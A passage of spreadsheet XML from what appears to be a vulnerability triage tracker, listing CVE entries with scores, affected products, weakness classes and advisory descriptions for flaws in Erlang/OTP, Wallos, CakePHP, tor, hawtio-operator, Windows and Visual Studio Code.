      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73270</t>
        </is>
      </c>
      <c r="D614" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F614" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr"/>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr"/>
      <c r="Q614" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R614" s="5" t="inlineStr">
        <is>
          <t>Improper Handling of Case Sensitivity vulnerability in Erlang/OTP inets httpd allows a remote unauthenticated attacker to read files inside a mod_auth protected directory by requesting them with different casing, on deployments whose filesystem is case-insensitive.
mod_auth:secret_path/3 decides whether a resolved filesystem path lies inside a protected directory block by running the configured directory path through re:run/3 without the caseless option. A request for /secret/file against a directory configured as /Secret therefore does not match, so the request is treated as unprotected and no authentication challenge is issued, while the filesystem resolves the differently cased path to the same file and mod_get serves it. Deployments on case-sensitive filesystems are unaffected, because there the filesystem itself rejects the mismatched casing.
This issue affects OTP from OTP 17.0 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to inets from 5.10 before 9.3.2.7, from 9.4 before 9.6.2.3, and from 9.7 before 9.7.2. Whether OTP before OTP 17.0, corresponding to inets before 5.10, is affected is unknown.</t>
        </is>
      </c>
      <c r="S614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73270</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75538</t>
        </is>
      </c>
      <c r="D615" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F615" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr"/>
      <c r="K615" s="5" t="inlineStr"/>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr"/>
      <c r="Q615" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R615" s="5" t="inlineStr">
        <is>
          <t>An attacker that connects to an open Erlang TCP port that uses the inet driver with {packet,4} mode can use a signed overflow in an incorrect packet length calculation to overflow the receive buffer into the VM allocator area and beyond up to about 2 GB.
This would easily trash the allocated block's allocator metadata footer, and the next block, if any, and most likely cause the BEAM VM to crash. Utilizing this with precision enough to achieve Remote Code Execution would be extremely unfeasible.
This issue affects OTP from OTP 17.0 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to erts from 6.0 before 15.2.7.13, from 16.0 before 16.4.0.6, and from 17.0 before 17.0.6. Whether OTP before OTP 17.0, corresponding to erts before 6.0, is affected is unknown.</t>
        </is>
      </c>
      <c r="S615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75538</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75594</t>
        </is>
      </c>
      <c r="D616" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F616" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="K616" s="5" t="inlineStr"/>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr"/>
      <c r="Q616" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R616"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S616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75594</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76191</t>
        </is>
      </c>
      <c r="D617" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F617" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr">
        <is>
          <t>adobe:animate, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr"/>
      <c r="Q617" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R617"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S617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76191</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76202</t>
        </is>
      </c>
      <c r="D618" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F618" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr"/>
      <c r="Q618" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R618"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S618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76202</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77097</t>
        </is>
      </c>
      <c r="D619" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr"/>
      <c r="Q619" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R619" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="S619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77348</t>
        </is>
      </c>
      <c r="D620" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F620" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr"/>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr"/>
      <c r="Q620" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="R620" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 5.0.0, the fix for CVE-2026-33407 (GHSA-hhjq-82f8-m6rc, "SSRF via HTTP Proxy Environment Variable") hardened endpoints/logos/search.php by disabling cURL proxying (CURLOPT_PROXY = '' + CURLOPT_NOPROXY = '*'). However, Wallos ships a second, near-identical, unauthenticated logo-image search endpoint — endpoints/payments/search.php — that was not given the same hardening. It still passes the HTTP_PROXY/HTTPS_PROXY environment variable straight into CURLOPT_PROXY. This issue has been patched in version 5.0.0.</t>
        </is>
      </c>
      <c r="S620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77348</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77634</t>
        </is>
      </c>
      <c r="D621" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F621" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr"/>
      <c r="L621" s="5" t="inlineStr">
        <is>
          <t>composer:cakephp/cakephp</t>
        </is>
      </c>
      <c r="M621" s="5" t="inlineStr">
        <is>
          <t>4.5.12, 4.6.5, 5.1.9, 5.2.14, 5.3.7</t>
        </is>
      </c>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr"/>
      <c r="P621" s="5" t="inlineStr"/>
      <c r="Q621" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R621" s="5" t="inlineStr">
        <is>
          <t>### Impact
Custom mail headers added with `Message::setHeaders()` or `addHeaders()` do not have CRLF replaced allowing header injection if user controlled data is added to message headers without stripping CRLF bytes.
### Patches
5.3.7, 5.2.14, 5.1.9, 4.6.5, 4.5.12 contain fixes for this issue.
### Workarounds
You can strip CRLF bytes from email header values before setting header values.</t>
        </is>
      </c>
      <c r="S621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77634</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77641</t>
        </is>
      </c>
      <c r="D622" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr">
        <is>
          <t>torproject:tor</t>
        </is>
      </c>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr"/>
      <c r="Q622" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="R622" s="5" t="inlineStr">
        <is>
          <t>tor before 0.4.9.9 was prone to a NULL write after free when sending a CONFLUX_SWITCH cell fails. The return value of relay_send_command_from_edge() was   ignored, so a send failure (which calls circuit_mark_for_close()  and removes the leg via cfx_del_leg()) would go undetected, causing the caller to write to the now-freed current leg and resulting in a crash. This is TROVE-2026-017.</t>
        </is>
      </c>
      <c r="S622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77641</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77968</t>
        </is>
      </c>
      <c r="D623" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F623" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr"/>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr"/>
      <c r="Q623" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R623" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. The operator's ClusterRole grants secrets: [create, get, list, update, watch] across all namespaces. While the operator uses a controller-runtime label-selector cache as a memory optimization, the ServiceAccount token authorizes read access to every Secret in the cluster. The operator also bypasses the cache via direct API calls. Compromise of the operator pod would yield read access to every Secret in the cluster, including bootstrap tokens, cloud credentials, and other operators' secrets.</t>
        </is>
      </c>
      <c r="S623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77968</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79676</t>
        </is>
      </c>
      <c r="D624" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F624" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M624" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr"/>
      <c r="P624" s="5" t="inlineStr"/>
      <c r="Q624" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="R624" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80206</t>
        </is>
      </c>
      <c r="D625" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F625" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I625" s="5" t="inlineStr"/>
      <c r="J625" s="5" t="inlineStr"/>
      <c r="K625" s="5" t="inlineStr"/>
      <c r="L625" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M625" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N625" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O625" s="5" t="inlineStr"/>
      <c r="P625" s="5" t="inlineStr"/>
      <c r="Q625" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R625" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81354</t>
        </is>
      </c>
      <c r="D626" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F626" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G626" s="5" t="inlineStr"/>
      <c r="H626" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I626" s="5" t="inlineStr"/>
      <c r="J626" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K626" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t>
        </is>
      </c>
      <c r="L626" s="5" t="inlineStr"/>
      <c r="M626" s="5" t="inlineStr"/>
      <c r="N626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O626" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr"/>
      <c r="Q626" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R626" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81356</t>
        </is>
      </c>
      <c r="D627" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F627" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G627" s="5" t="inlineStr"/>
      <c r="H627" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I627" s="5" t="inlineStr"/>
      <c r="J627" s="5" t="inlineStr"/>
      <c r="K627" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L627" s="5" t="inlineStr"/>
      <c r="M627" s="5" t="inlineStr"/>
      <c r="N627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O627" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr"/>
      <c r="Q627" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R627" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81357</t>
        </is>
      </c>
      <c r="D628" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F628" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G628" s="5" t="inlineStr"/>
      <c r="H628" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I628" s="5" t="inlineStr"/>
      <c r="J628" s="5" t="inlineStr"/>
      <c r="K628" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L628" s="5" t="inlineStr"/>
      <c r="M628" s="5" t="inlineStr"/>
      <c r="N628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O628" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr"/>
      <c r="Q628" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R628" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81378</t>
        </is>
      </c>
      <c r="D629" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F629" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L629" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr"/>
      <c r="Q629" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="R629" s="5" t="inlineStr">
        <is>
          <t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81379</t>
        </is>
      </c>
      <c r="D630" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F630" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr"/>
      <c r="K630" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr"/>
      <c r="Q630" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="R630" s="5" t="inlineStr">
        <is>
